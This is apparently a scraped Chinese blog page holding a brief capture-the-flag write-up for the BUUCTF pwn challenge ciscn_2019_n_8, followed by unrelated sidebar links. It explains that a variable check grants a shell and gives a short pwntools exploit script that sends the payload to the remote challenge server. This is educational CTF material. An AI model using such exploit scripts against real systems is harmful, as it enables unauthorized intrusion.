当前位置:网站首页>buuctf pwn ciscn_2019_n_8
buuctf pwn ciscn_2019_n_8
2022-06-21 22:22:00 【[mzq]】
ciscn_2019_n_8
checksec 看一下基本信息
把程序拖到ida32分析一波,可以看到 scanf 读入字符串给了 var 然后后面的v4,v5没起作用,然后判断了var[13]是不是等于\x11,是就给一个shell
所以只要让我们输入的字符后13位等于 \x11
from pwn import *
io = process("./ciscn_2019_n_8")
io = remote("node4.buuoj.cn",29622)
context(log_level="debug",arch="i386")
payload = flat(["aaaa"*13,0x11]) # 因为32为是4个bit 所以说4个a
io.sendline(payload)
io.interactive()
边栏推荐
- 青春无言│用技术定格毕业季最美好的回忆
- Programming dry goods │ PHP common method encapsulation
- Cvpr2022 𞓜 loss problem in weakly supervised multi label classification
- Rk3568 Development Notes (II): introduction to the kit, backplane and peripheral test of rk3568 development board
- Hardware development notes (IV): basic process of hardware development, making a USB to RS232 module (III): design schematic diagram
- Six little-known SQL technologies in SQL tutorial can help you save 100 hours per month
- The third "invalidation" of the prospectus of Yiteng pharmaceutical in Hong Kong: the listing was substantially delayed, Sequoia and other shareholders
- kubernetes code-generator使用
- 硬件开发笔记(四):硬件开发基本流程,制作一个USB转RS232的模块(三):设计原理图
- How to uninstall windows SQL Server cleanly?
猜你喜欢
Based on vscode platformio under Arduino framework, one project is configured with two compatibility modes of different development boards
About the solution to the "fatal error: gl/gl.h: no such file or directory" of Qilin system development error
Youth without words │ use technology to frame the best memories of graduation season
211 thèse de maîtrise en divinité à l'Université! 75 lignes et 20 mauvaises lignes! Réponse de l'école: le tuteur a arrêté d'inscrire...
Isn't the so-called 0 copy just to let the CPU rest? Deep understanding of MMAP
Why applets and the industrial Internet can complement each other
被八股文害惨了。。。。
7. target detection
leetcode1337. 矩阵中战斗力最弱的K行
RK3568开发笔记(三):RK3568虚拟机基础环境搭建之更新源、安装网络工具、串口调试、网络连接、文件传输、安装vscode和samba共享服务
随机推荐
请问东方财富期货正规吗?这家平台安全靠谱么?
Enterprise comprehensive networking Training II
How to uninstall windows SQL Server cleanly?
Solution to garbled Chinese display of securefx transmission remote server
Go language learning tutorial (12)
Based on vscode platformio under Arduino framework, one project is configured with two compatibility modes of different development boards
Mono 的创建
通过QT的拖拽事件来操作文件
Redis master-slave replication (9)
Operate files through QT drag events
洞见数据价值,启迪数字未来,《数字化的力量》问世
Online text batch inversion by line tool
6月編程語言排行榜已出,這門語言要“封神”
Win11 how to change the desktop file path to disk D
eureka的解析
SQL interview questions: top 15 questions in 2022
组件传值:父组件与子组件传值用props
可省近90%服务器,反欺诈效率却大增,PayPal打破「AI内存墙」的方案为何如此划算?
Programming dry goods │ PHP common method encapsulation
Install the domestic image of scoop in Windows